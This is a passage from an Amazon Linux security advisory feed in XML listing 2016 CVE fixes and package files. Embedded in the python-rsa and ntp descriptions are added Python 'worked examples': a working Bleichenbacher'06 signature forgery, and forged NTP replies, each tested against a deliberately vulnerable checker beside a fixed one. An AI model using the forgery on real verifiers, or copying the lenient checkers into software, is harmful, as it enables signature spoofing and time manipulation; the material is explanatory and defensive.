release="2.6.4.0.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.95-2.6.4.0.65.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.95" release="2.6.4.0.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.95-2.6.4.0.65.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.95" release="2.6.4.0.65.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.95-2.6.4.0.65.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.95" release="2.6.4.0.65.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.95-2.6.4.0.65.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.95" release="2.6.4.0.65.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.95-2.6.4.0.65.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.95" release="2.6.4.0.65.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.95-2.6.4.0.65.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.95" release="2.6.4.0.65.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.95-2.6.4.0.65.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-644</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-644: medium priority package update for python-rsa</title><issued date="2016-02-09 13:30:00" /><updated date="2016-02-09 13:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-1494:
1295869:
CVE-2016-1494 python-rsa: Signature forgery using Bleichenbacher'06 attack
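Worked example (added here; illustrative code, not python-rsa's own implementation, and the lenient verifier is an assumed, simplified model of the bug class rather than a copy of the affected or patched function): with public exponent 3 the Bleichenbacher'06 forgery needs no private key. It builds the largest 256-byte block that begins with 00 01, a few FF bytes, 00 and the SHA-256 DigestInfo for the target message, takes the integer cube root of that block and uses the root as the signature. Cubing the root reproduces the prefix exactly and pushes the rounding error into trailing bytes that a verifier which merely searches for the DigestInfo never examines. A verifier that re-encodes the expected block and compares it in full rejects the same forgery. The 2048-bit key size, the sample message and the helper names are choices made for the example; key generation takes about a second in pure Python.

```python
"""Bleichenbacher'06 forgery (e = 3) against a lenient PKCS#1 v1.5 verifier.  Added
illustration, not python-rsa code: verify_lenient is an assumed model of the bug class.  Python 3.8+."""
import hashlib
import hmac
import secrets

SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")  # RFC 8017, 9.2
SMALL_PRIMES = [p for p in range(3, 2000, 2) if all(p % q for q in range(3, p, 2))]

def is_probable_prime(n, rounds=16):
    """Trial division, then Miller-Rabin; adequate for a demo key."""
    if n == 1 or n % 2 == 0:
        return n == 2
    for p in SMALL_PRIMES:
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def gen_keypair(bits=2048, e=3):
    """Random RSA key with public exponent 3; returns ((n, e), d)."""
    def prime():
        while True:
            cand = secrets.randbits(bits // 2) | 2 ** (bits // 2 - 1) | 1
            if cand % 3 == 2 and is_probable_prime(cand):  # keeps gcd(3, p - 1) == 1
                return cand
    p, q = prime(), prime()
    return (p * q, e), pow(e, -1, (p - 1) * (q - 1))

def emsa_pkcs1_v15(message, k):
    """00 01 FF..FF 00 || DigestInfo || SHA-256(message), exactly k bytes."""
    t = SHA256_DIGESTINFO + hashlib.sha256(message).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t

def sign(message, d, pub):
    n, _ = pub
    k = (n.bit_length() + 7) // 8
    return pow(int.from_bytes(emsa_pkcs1_v15(message, k), "big"), d, n).to_bytes(k, "big")

def verify_lenient(message, sig, pub):
    """Vulnerable: finds the DigestInfo anywhere after the first 00 and ignores the rest."""
    n, e = pub
    em = pow(int.from_bytes(sig, "big"), e, n).to_bytes((n.bit_length() + 7) // 8, "big")
    sep = em.find(b"\x00", 2)
    if em[:2] != b"\x00\x01" or sep == -1:
        return False
    idx = em.find(SHA256_DIGESTINFO, sep + 1)
    if idx == -1:
        return False
    start = idx + len(SHA256_DIGESTINFO)
    return hmac.compare_digest(em[start:start + 32], hashlib.sha256(message).digest())

def verify_strict(message, sig, pub):
    """Fixed: recompute the whole encoded block and require an exact match."""
    n, e = pub
    k, s = (n.bit_length() + 7) // 8, int.from_bytes(sig, "big")
    if len(sig) != k or s >= n:
        return False
    return hmac.compare_digest(pow(s, e, n).to_bytes(k, "big"), emsa_pkcs1_v15(message, k))

def icbrt(x):
    """Floor of the integer cube root (Newton's method from an overestimate)."""
    r = 2 ** ((x.bit_length() + 2) // 3)
    while True:
        nr = (2 * r + x // (r * r)) // 3
        if nr >= r:
            return r
        r = nr

def forge(message, pub, ps_len=8):
    """No private key: cube-root the largest block with a short valid-looking prefix."""
    n, e = pub
    if e != 3:
        raise ValueError("this forgery needs e == 3")
    k = (n.bit_length() + 7) // 8
    prefix = (b"\x00\x01" + b"\xff" * ps_len + b"\x00" + SHA256_DIGESTINFO
              + hashlib.sha256(message).digest())
    top = int.from_bytes(prefix + b"\xff" * (k - len(prefix)), "big")
    return icbrt(top).to_bytes(k, "big")  # root**3 is below n, so no modular reduction

def demo(message=b"transfer 100 to bob"):  # constructed sample message
    pub, d = gen_keypair()
    real, fake = sign(message, d, pub), forge(message, pub)
    return {"real_strict": verify_strict(message, real, pub),
            "real_lenient": verify_lenient(message, real, pub),
            "forged_lenient": verify_lenient(message, fake, pub),
            "forged_strict": verify_strict(message, fake, pub)}
```

Calling demo() shows both verifiers accepting the genuine signature, the lenient one also accepting the forgery and the strict one rejecting it. The forgery works because the fixed prefix is well under a third of the block: the cube of the rounded root differs from the target only in its low 1552 bits, while the prefix occupies the top 496.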
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1494" title="" id="CVE-2016-1494" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-rsa" version="3.3" release="2.7.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-rsa-3.3-2.7.amzn1.noarch.rpm</filename></package><package name="python27-rsa" version="3.3" release="2.7.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-rsa-3.3-2.7.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-645</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-645: medium priority package update for nss</title><issued date="2016-02-09 13:30:00" /><updated date="2016-02-09 13:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-7575:
A flaw was found in the way TLS 1.2 could use the MD5 hash function for signing ServerKeyExchange and Client Authentication packets during a TLS handshake. A man-in-the-middle attacker able to force a TLS connection to use the MD5 hash function could use this flaw to conduct collision attacks to impersonate a TLS server or an authenticated TLS client.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7575" title="" id="CVE-2015-7575" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2016:0007.html" title="" id="RHSA-2016:0007" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-tools" version="3.19.1" release="19.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.19.1-19.75.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.19.1" release="19.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.19.1-19.75.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.19.1" release="19.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.19.1-19.75.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.19.1" release="19.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.19.1-19.75.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.19.1" release="19.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.19.1-19.75.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.19.1" release="19.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.19.1-19.75.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.19.1" release="19.75.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.19.1-19.75.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.19.1" release="19.75.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.19.1-19.75.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.19.1" release="19.75.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.19.1-19.75.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.19.1" release="19.75.amzn1" epoch="0" 
arch="i686"><filename>Packages/nss-tools-3.19.1-19.75.amzn1.i686.rpm</filename></package><package name="nss" version="3.19.1" release="19.75.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.19.1-19.75.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.19.1" release="19.75.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.19.1-19.75.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-646</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-646: low priority package update for pngcrush</title><issued date="2016-02-09 13:30:00" /><updated date="2016-02-09 13:30:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-7700:
A double-free bug was discovered in pngcrush's handling of the sPLT chunk.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7700" title="" id="CVE-2015-7700" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="pngcrush-debuginfo" version="1.7.92" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/pngcrush-debuginfo-1.7.92-1.11.amzn1.x86_64.rpm</filename></package><package name="pngcrush" version="1.7.92" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/pngcrush-1.7.92-1.11.amzn1.x86_64.rpm</filename></package><package name="pngcrush" version="1.7.92" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/pngcrush-1.7.92-1.11.amzn1.i686.rpm</filename></package><package name="pngcrush-debuginfo" version="1.7.92" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/pngcrush-debuginfo-1.7.92-1.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-647</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-647: important priority package update for java-1.8.0-openjdk</title><issued date="2016-02-09 13:30:00" /><updated date="2016-02-09 13:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0494:
Unspecified vulnerability in the Java SE and Java SE Embedded components in Oracle Java SE 6u105, 7u91, and 8u66 and Java SE Embedded 8u65 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.
1298906:
CVE-2016-0494 ICU: integer signedness issue in IndicRearrangementProcessor (OpenJDK 2D, 8140543)
CVE-2016-0483:
An out-of-bounds write flaw was found in the JPEG image format decoder in the AWT component in OpenJDK. A specially crafted JPEG image could cause a Java application to crash or, possibly, execute arbitrary code. An untrusted Java application or applet could use this flaw to bypass Java sandbox restrictions.
1299441:
CVE-2016-0483 OpenJDK: incorrect boundary check in JPEG decoder (AWT, 8139017)
CVE-2016-0475:
It was discovered that the password-based encryption (PBE) implementation in the Libraries component in OpenJDK used an incorrect key length. This could, in certain cases, lead to generation of keys that were weaker than expected.
1298949:
CVE-2016-0475 OpenJDK: PBE incorrect key lengths (Libraries, 8138589)
CVE-2016-0466:
It was discovered that the JAXP component in OpenJDK did not properly enforce the totalEntitySizeLimit limit. An attacker able to make a Java application process a specially crafted XML file could use this flaw to make the application consume an excessive amount of memory.
1299385:
CVE-2016-0466 OpenJDK: insufficient enforcement of totalEntitySizeLimit (JAXP, 8133962)
CVE-2016-0448:
Unspecified vulnerability in the Java SE and Java SE Embedded components in Oracle Java SE 6u105, 7u91, and 8u66, and Java SE Embedded 8u65 allows remote authenticated users to affect confidentiality via vectors related to JMX.
1299073:
CVE-2016-0448 OpenJDK: logging of RMI connection secrets (JMX, 8130710)
CVE-2016-0402:
Unspecified vulnerability in the Java SE and Java SE Embedded components in Oracle Java SE 6u105, 7u91, and 8u66 and Java SE Embedded 8u65 allows remote attackers to affect integrity via unknown vectors related to Networking.
1298957:
CVE-2016-0402 OpenJDK: URL deserialization inconsistencies (Networking, 8059054)
CVE-2015-7575:
A flaw was found in the way TLS 1.2 could use the MD5 hash function for signing ServerKeyExchange and Client Authentication packets during a TLS handshake. A man-in-the-middle attacker able to force a TLS connection to use the MD5 hash function could use this flaw to conduct collision attacks to impersonate a TLS server or an authenticated TLS client.
1289841:
CVE-2015-7575 TLS 1.2 Transcript Collision attacks against MD5 in key exchange protocol (SLOTH)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7575" title="" id="CVE-2015-7575" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0402" title="" id="CVE-2016-0402" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0448" title="" id="CVE-2016-0448" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0466" title="" id="CVE-2016-0466" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0475" title="" id="CVE-2016-0475" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0483" title="" id="CVE-2016-0483" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0494" title="" id="CVE-2016-0494" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.71" release="2.b15.8.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.71-2.b15.8.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.71" release="2.b15.8.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.71-2.b15.8.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.71" release="2.b15.8.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.71-2.b15.8.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.71" release="2.b15.8.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.71-2.b15.8.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.71" release="2.b15.8.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.71-2.b15.8.amzn1.x86_64.rpm</filename></package><package 
name="java-1.8.0-openjdk-demo" version="1.8.0.71" release="2.b15.8.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.71-2.b15.8.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.71" release="2.b15.8.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.71-2.b15.8.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.71" release="2.b15.8.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.71-2.b15.8.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.71" release="2.b15.8.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.71-2.b15.8.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.71" release="2.b15.8.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.71-2.b15.8.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.71" release="2.b15.8.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.71-2.b15.8.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.71" release="2.b15.8.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.71-2.b15.8.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.71" release="2.b15.8.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.71-2.b15.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-648</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-648: medium priority package update for kernel</title><issued date="2016-02-09 13:30:00" /><updated date="2016-02-09 13:30:00" 
/><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0723:
1296253:
CVE-2016-0723 kernel: Kernel memory disclosure and crash in tty layer
CVE-2015-8767:
1297389:
CVE-2015-8767 kernel: SCTP denial of service during timeout
CVE-2015-8709:
A privilege-escalation vulnerability was discovered in the Linux kernel built with User Namespace (CONFIG_USER_NS) support. The flaw occurred when the ptrace() system call was used on a root-owned process to enter a user namespace. A privileged namespace user could exploit this flaw to potentially escalate their privileges on the system, outside the original namespace.
1295287:
CVE-2015-8709 Kernel: ptrace: potential privilege escalation in user namespaces
CVE-2013-4312:
1297813:
CVE-2013-4312 kernel: File descriptors passed over unix sockets are not properly accounted
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4312" title="" id="CVE-2013-4312" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8709" title="" id="CVE-2015-8709" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8767" title="" id="CVE-2015-8767" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0723" title="" id="CVE-2016-0723" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.1.17" release="22.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.1.17-22.30.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.1.17" release="22.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.1.17-22.30.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.1.17" release="22.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.1.17-22.30.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.1.17" release="22.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.1.17-22.30.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.1.17" release="22.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.1.17-22.30.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.1.17" release="22.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.1.17-22.30.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.1.17" release="22.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.1.17-22.30.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.1.17" release="22.30.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.1.17-22.30.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.1.17" release="22.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.1.17-22.30.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.1.17" release="22.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.1.17-22.30.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.1.17" release="22.30.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.1.17-22.30.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.1.17" release="22.30.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.1.17-22.30.amzn1.i686.rpm</filename></package><package name="perf" version="4.1.17" release="22.30.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.1.17-22.30.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.1.17" release="22.30.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.1.17-22.30.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.1.17" release="22.30.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.1.17-22.30.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.1.17" release="22.30.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.1.17-22.30.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.1.17" release="22.30.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.1.17-22.30.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.1.17" release="22.30.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.1.17-22.30.amzn1.i686.rpm</filename></package><package name="kernel" version="4.1.17" release="22.30.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-4.1.17-22.30.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.1.17" release="22.30.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.1.17-22.30.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.1.17" release="22.30.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.1.17-22.30.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-649</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-649: important priority package update for ntp</title><issued date="2016-02-09 13:30:00" /><updated date="2016-10-18 12:15:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-4953:
ntpd in NTP 4.x before 4.2.8p8 allows remote attackers to cause a denial of service (ephemeral-association demobilization) by sending a spoofed crypto-NAK packet with incorrect authentication data at a certain time.
1340852:
CVE-2016-4953 ntp: bad authentication demobilizes ephemeral associations
CVE-2015-8158:
1300273:
CVE-2015-8158 ntp: potential infinite loop in ntpq
CVE-2015-8138:
It was discovered that ntpd as a client did not correctly check the originate timestamp in received packets. A remote attacker could use this flaw to send a crafted packet to an ntpd client that would effectively disable synchronization with the server, or push arbitrary offset/delay measurements to modify the time on the client.
1299442:
CVE-2015-8138 ntp: missing check for zero originate timestamp
CVE-2015-7979:
1300271:
CVE-2015-7979 ntp: off-path denial of service on authenticated broadcast mode
CVE-2015-7978:
1300270:
CVE-2015-7978 ntp: stack exhaustion in recursive traversal of restriction list
CVE-2015-7977:
1300269:
CVE-2015-7977 ntp: restriction list NULL pointer dereference
CVE-2015-7974:
NTP 4.x before 4.2.8p6 and 4.3.x before 4.3.90 do not verify peer associations of symmetric keys when authenticating packets, which might allow remote attackers to conduct impersonation attacks via an arbitrary trusted key, aka a &quot;skeleton key.&quot;
1297471:
CVE-2015-7974 ntp: missing key check allows impersonation between authenticated peers (VU#357792)
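Worked example (added here; not ntpd's code, and the lenient checker is an assumed, simplified model of the two bug classes rather than a transcription of ntpd's receive logic): a client-side reply check that binds each response to the request it answers by requiring the originate timestamp to equal the transmit timestamp the client sent, treats a zero originate timestamp as a mismatch rather than a free pass (CVE-2015-8138), and accepts a MAC only under the key id configured for that peer instead of under any key in the trusted keyring (CVE-2015-7974). The packet layout and MAC construction follow RFC 5905; the key names, timestamps and the three forged replies are constructed for the demonstration.

```python
"""Client-side validation of an NTP reply: originate-timestamp binding (CVE-2015-8138) and
key-id binding (CVE-2015-7974).  Added illustration, not ntpd code: the lenient checker is
an assumed model of the two bug classes."""
import hashlib
import hmac
import secrets
import struct

NTP_HEADER = "!BBBbIIIQQQQ"  # LI/VN/mode, stratum, poll, precision, delay, disp, refid, 4 timestamps
NTP_UNIX_OFFSET = 2208988800  # seconds from 1900-01-01 (NTP era 0) to 1970-01-01

def ntp_timestamp(unix_seconds, fraction=None):
    """64-bit NTP timestamp; the fraction doubles as a nonce, so keep it unpredictable."""
    if fraction is None:
        fraction = secrets.randbits(32)
    return (int(unix_seconds) + NTP_UNIX_OFFSET) * 2 ** 32 + fraction

def build_packet(mode, orig, recv, xmt, key_id=None, key=None, stratum=2):
    """48-byte NTPv4 header, optionally followed by key id + MD5(key || header) (RFC 5905 A.6)."""
    li_vn_mode = 4 * 8 + mode  # LI = 0, VN = 4
    header = struct.pack(NTP_HEADER, li_vn_mode, stratum, 6, -20, 0, 0, 0, 0, orig, recv, xmt)
    if key_id is None:
        return header
    return header + struct.pack("!I", key_id) + hashlib.md5(key + header).digest()

def parse_packet(data):
    if len(data) not in (48, 68):
        raise ValueError("unexpected NTP packet length %d" % len(data))
    f = struct.unpack(NTP_HEADER, data[:48])
    pkt = {"mode": f[0] % 8, "stratum": f[1], "orig": f[8], "recv": f[9], "xmt": f[10]}
    if len(data) == 68:
        pkt["key_id"] = struct.unpack("!I", data[48:52])[0]
        pkt["mac"] = data[52:]
    return pkt

def mac_ok(data, key, pkt):
    return hmac.compare_digest(hashlib.md5(key + data[:48]).digest(), pkt.get("mac", b""))

def accept_reply_lenient(data, sent_xmt, keyring, peer_key_id):
    """Vulnerable on two counts: a zero origin skips the request/response binding, and
    any key in the trusted keyring is allowed to authenticate this association."""
    pkt = parse_packet(data)
    if pkt["mode"] != 4:
        return False
    if pkt["orig"] != 0 and pkt["orig"] != sent_xmt:
        return False
    if peer_key_id is None:
        return True
    key = keyring.get(pkt.get("key_id"))
    return key is not None and mac_ok(data, key, pkt)

def accept_reply_strict(data, sent_xmt, keyring, peer_key_id):
    """Fixed: the origin must echo exactly what we sent (zero never does), and only the
    key configured for this peer may authenticate its packets."""
    pkt = parse_packet(data)
    if pkt["mode"] != 4 or sent_xmt == 0 or pkt["orig"] != sent_xmt:
        return False
    if peer_key_id is None:
        return True
    if pkt.get("key_id") != peer_key_id:
        return False
    return mac_ok(data, keyring[peer_key_id], pkt)

def demo():
    """Constructed exchange: one honest server, one off-path spoofer, one rogue peer
    that holds a different trusted key.  Returns what each checker decides."""
    keyring = {1: b"key-for-our-server", 2: b"key-for-some-other-peer"}  # constructed keys
    sent = ntp_timestamp(1454981400)  # transmit timestamp of the client's request (2016-02-09)
    t1, t2 = ntp_timestamp(1454981400, 0x10000000), ntp_timestamp(1454981400, 0x20000000)
    honest = build_packet(4, sent, t1, t2)
    honest_auth = build_packet(4, sent, t1, t2, 1, keyring[1])
    spoofed = build_packet(4, 0, t1, t2)  # off-path attacker cannot know sent, sends 0
    guessed = build_packet(4, sent ^ 1, t1, t2)  # off-path attacker guesses wrong
    skeleton = build_packet(4, sent, t1, t2, 2, keyring[2])  # rogue peer holding trusted key 2
    return {
        "honest_lenient": accept_reply_lenient(honest, sent, keyring, None),
        "honest_strict": accept_reply_strict(honest, sent, keyring, None),
        "zero_orig_lenient": accept_reply_lenient(spoofed, sent, keyring, None),
        "zero_orig_strict": accept_reply_strict(spoofed, sent, keyring, None),
        "wrong_orig_strict": accept_reply_strict(guessed, sent, keyring, None),
        "auth_honest_strict": accept_reply_strict(honest_auth, sent, keyring, 1),
        "skeleton_lenient": accept_reply_lenient(skeleton, sent, keyring, 1),
        "skeleton_strict": accept_reply_strict(skeleton, sent, keyring, 1),
    }
```

Calling demo() returns one boolean per case: the lenient checker accepts both the zero-origin reply and the reply authenticated with the other peer's key, while the strict checker rejects both and still accepts the honest replies. Making the fraction bits of the transmit timestamp unpredictable is what gives the originate check its value against an off-path attacker who can spoof the server's address but not see the request.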
